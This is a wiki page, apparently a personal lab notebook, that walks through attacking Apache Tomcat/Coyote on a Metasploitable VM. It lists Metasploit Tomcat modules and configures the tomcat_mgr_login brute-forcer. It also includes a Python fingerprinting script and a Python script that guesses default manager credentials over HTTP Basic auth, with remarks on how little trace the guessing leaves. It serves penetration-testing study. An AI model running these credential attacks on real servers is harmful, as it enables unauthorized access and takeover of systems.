Metasploitable/Apache/Tomcat and Coyote: Difference between revisions
From charlesreid1
Revision as of 03:03, 30 March 2016
Tomcat Service
We will attempt to abuse the Tomcat server in order to obtain access to the web server. The end goal is to obtain a shell on the web server.
Just a reminder of what the nmap scan returned about Apache Tomcat and Coyote:
10.0.0.27 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
JSP stands for JavaServer Pages. All this means is that pages requested on port 8180 are JSP templates that Tomcat compiles into Java servlets and runs on the server side; the browser only ever sees the resulting HTML.
What is tomcat
Apache Tomcat is a servlet container: a Java server that runs server-side web applications (servlets and JSP pages). It has nothing to do with applets in the browser. The "1.1" in the nmap line is the version of the Coyote connector, not of Tomcat itself, so the Tomcat version is the first thing we'll want to figure out. Tomcat's default landing page at http://10.0.0.27:8180/ prints it; the Server header does not.
What is coyote
Coyote is not a stand-alone web server. It is Tomcat's HTTP connector, the component that accepts TCP connections on the port, parses HTTP/1.1, hands each request to the servlet engine (Catalina) and writes the response back. That is why the banner names Coyote rather than Tomcat: the Server header Tomcat sends is Apache-Coyote/1.1.
From the description of Coyote on the Tomcat page [1], the HTTP/1.1 connector in Tomcat of this vintage is a blocking, one-thread-per-connection design capped by maxThreads, so it is as susceptible to connection-exhaustion (slowloris-style) denial of service attacks as the Apache web server was.
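The two facts above (the banner only identifies the Coyote connector, and the Tomcat version has to be read off the index page) are easy to confirm by hand. The script below is an added example written for this page, not the page's or nmap's own code: it fetches / and /manager/html from the assumed target 10.0.0.27:8180, pulls the versions out with regular expressions, and reports whether the Manager application is present and protected by HTTP Basic auth (which is what the login module later on relies on). The sample header and body at the bottom are constructed, not captured from a real host.

```python
"""Fingerprint a Tomcat/Coyote service and check for the Manager app.

Added example for this page. Assumptions: target 10.0.0.27:8180 (from the nmap
line above), and that the server answers like a stock old Tomcat. The SAMPLE_*
values are constructed so the parsing can be exercised offline.
"""
import http.client
import re

# Tomcat's default index page embeds "Apache Tomcat/X.Y"; the Server header
# only names the Coyote HTTP/1.1 connector, which is why nmap prints "1.1".
TOMCAT_VERSION_RE = re.compile(r"Apache Tomcat/(\d+(?:\.\d+)+)")
COYOTE_RE = re.compile(r"Apache-Coyote/(\d+\.\d+)")


def parse_banner(server_header, body):
    """Return (coyote_version, tomcat_version); either may be None."""
    coyote = COYOTE_RE.search(server_header or "")
    tomcat = TOMCAT_VERSION_RE.search(body or "")
    return (coyote.group(1) if coyote else None,
            tomcat.group(1) if tomcat else None)


def classify_manager(status, www_authenticate):
    """Translate the status for /manager/html into what it means to an attacker."""
    if status == 401 and (www_authenticate or "").lower().startswith("basic"):
        return "manager present, HTTP Basic auth (credential guessing applies)"
    if status == 401:
        return "manager present, non-Basic auth"
    if status == 404:
        return "manager app not deployed"
    if status == 403:
        return "manager present, access denied (IP filter or missing role)"
    if status == 200:
        return "manager accessible without credentials"
    return f"unexpected status {status}"


def _get(host, port, path, timeout):
    """One plain GET; returns (status, case-insensitive headers, body text)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.headers, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


def fingerprint(host="10.0.0.27", port=8180, timeout=5):
    """Fetch / and /manager/html and summarise what the service reveals."""
    _, headers, body = _get(host, port, "/", timeout)
    coyote, tomcat = parse_banner(headers.get("Server"), body)
    mgr_status, mgr_headers, _ = _get(host, port, "/manager/html", timeout)
    return {
        "coyote": coyote,
        "tomcat": tomcat,
        "manager": classify_manager(mgr_status, mgr_headers.get("WWW-Authenticate")),
    }


# Constructed sample of what an old Tomcat answers (not a real capture).
SAMPLE_SERVER_HEADER = "Apache-Coyote/1.1"
SAMPLE_INDEX_BODY = "<html><body><h1>Apache Tomcat/5.5</h1></body></html>"

if __name__ == "__main__":
    print(parse_banner(SAMPLE_SERVER_HEADER, SAMPLE_INDEX_BODY))
    print(classify_manager(401, 'Basic realm="Tomcat Manager Application"'))
    # Against the lab VM: print(fingerprint())
```

Run it against the VM with fingerprint(); the constructed sample in the main block shows the shape of the result without touching the network.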
Metasploit Modules for Tomcat
msf > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution
exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Novell ZENworks Configuration Management Arbitrary File Upload
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
We will focus on three modules (the two exploits are "Authenticated", so the login module has to succeed first):
auxiliary/scanner/http/tomcat_mgr_login
exploit/multi/http/tomcat_mgr_deploy
exploit/multi/http/tomcat_mgr_upload
tomcat mgr login
This module does not exploit anything by itself: it guesses credentials for the Tomcat Manager application (the /manager/html web app) over HTTP Basic authentication, using Metasploit's wordlists of default Tomcat users and passwords. Once a pair works, the two exploit modules above reuse it to deploy a WAR file and run code.
Here is info on this module from the Rapid7 website: https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login
Printing out the various options confirms it is a brute-force method. Note the defaults of RPORT 8080 and TARGETURI /manager/html:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show info
Name: Tomcat Application Manager Login Utility
Module: auxiliary/scanner/http/tomcat_mgr_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Matteo Cantoni <goony@nothink.org>
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Description:
This module simply attempts to login to a Tomcat Application Manager
instance using a specific user/pass.
References:
http://cvedetails.com/cve/2009-3843/
http://www.osvdb.org/60317
http://www.securityfocus.com/bid/37086
http://cvedetails.com/cve/2009-4189/
http://www.osvdb.org/60670
http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
http://www.zerodayinitiative.com/advisories/ZDI-09-085
http://cvedetails.com/cve/2009-4188/
http://www.securityfocus.com/bid/38084
http://cvedetails.com/cve/2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
http://cvedetails.com/cve/2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
http://cvedetails.com/cve/2009-3548/
http://www.osvdb.org/60176
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/
http://cvedetails.com/cve/1999-0502/
We'll definitely want to try blank passwords and the username as the password. One thing the defaults get wrong for this target: RPORT is 8080, but the nmap scan put Metasploitable's Tomcat on 8180, so it has to be set explicitly or every guess goes to a closed port. Let's set some options:
msf auxiliary(tomcat_mgr_login) > workspace metasploitable
[*] Workspace: metasploitable
msf auxiliary(tomcat_mgr_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true
Now fire it up. Tomcat before 7.0 has no LockOutRealm, so guessing is not throttled; the only trace it leaves on the target is a run of 401 responses in Tomcat's access log, and only if the AccessLogValve is enabled.
msf auxiliary(tomcat_mgr_login) > run
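To see what the module is actually doing on the wire, here is the same check written out by hand. This is an added example for this page, not the Metasploit module's code: each guess is one GET to /manager/html with an Authorization: Basic header, and Tomcat answers 200 on success, 401 on a wrong guess, and 403 when the user exists but lacks the manager role. The target 10.0.0.27:8180 and the four credential pairs are assumptions; the pairs are the stock tomcat-users.xml examples, a small subset of what Metasploit's tomcat_mgr_default_userpass.txt contains. The BLANK_PASSWORDS and USER_AS_PASS expansion and STOP_ON_SUCCESS behaviour mirror the module options shown above.

```python
"""Hand-rolled equivalent of tomcat_mgr_login: Basic-auth guesses at /manager/html.

Added example for this page, not Metasploit's code. Assumptions: target
10.0.0.27:8180; DEFAULT_USERPASS is a small assumed subset of the default
pairs, not the module's full wordlist.
"""
import base64
import http.client

# Assumed default pairs (the examples shipped in tomcat-users.xml).
DEFAULT_USERPASS = [("tomcat", "tomcat"), ("admin", "admin"),
                    ("role1", "role1"), ("both", "tomcat")]


def build_candidates(userpass, blank_passwords=False, user_as_pass=False):
    """Expand a user:pass list the way BLANK_PASSWORDS / USER_AS_PASS do.

    Order is preserved and duplicate pairs are dropped, so tomcat:tomcat is
    not tried twice when USER_AS_PASS is on.
    """
    seen, out = set(), []
    for user, password in userpass:
        extra = []
        if blank_passwords:
            extra.append((user, ""))
        if user_as_pass:
            extra.append((user, user))
        for pair in [(user, password)] + extra:
            if pair not in seen:
                seen.add(pair)
                out.append(pair)
    return out


def basic_auth_header(user, password):
    """RFC 7617 Basic credential: base64 of 'user:password'."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def interpret(status):
    """Map the manager's HTTP status to a verdict on the guessed credential."""
    return {200: "success",
            401: "bad credential",
            403: "valid credential, no manager role"}.get(status, "other")


def try_login(host, port, user, password, path="/manager/html", timeout=5):
    """One guess: GET the manager page with a Basic Authorization header."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path,
                     headers={"Authorization": basic_auth_header(user, password)})
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


def brute_force(host, port, candidates, stop_on_success=True):
    """Try each pair in order; return the ones that worked (STOP_ON_SUCCESS aware)."""
    found = []
    for user, password in candidates:
        verdict = interpret(try_login(host, port, user, password))
        print(f"[{verdict}] {user}:{password!r}")
        if verdict == "success":
            found.append((user, password))
            if stop_on_success:
                break
    return found


if __name__ == "__main__":
    # Port 8180, not the module default of 8080, for the Metasploitable target.
    cands = build_candidates(DEFAULT_USERPASS, blank_passwords=True, user_as_pass=True)
    print(brute_force("10.0.0.27", 8180, cands))
```

Every guess is a distinct HTTP request carrying the credential in cleartext base64, which is what makes the traffic trivial to spot on the wire and why the access log, when it is on, fills with 401s.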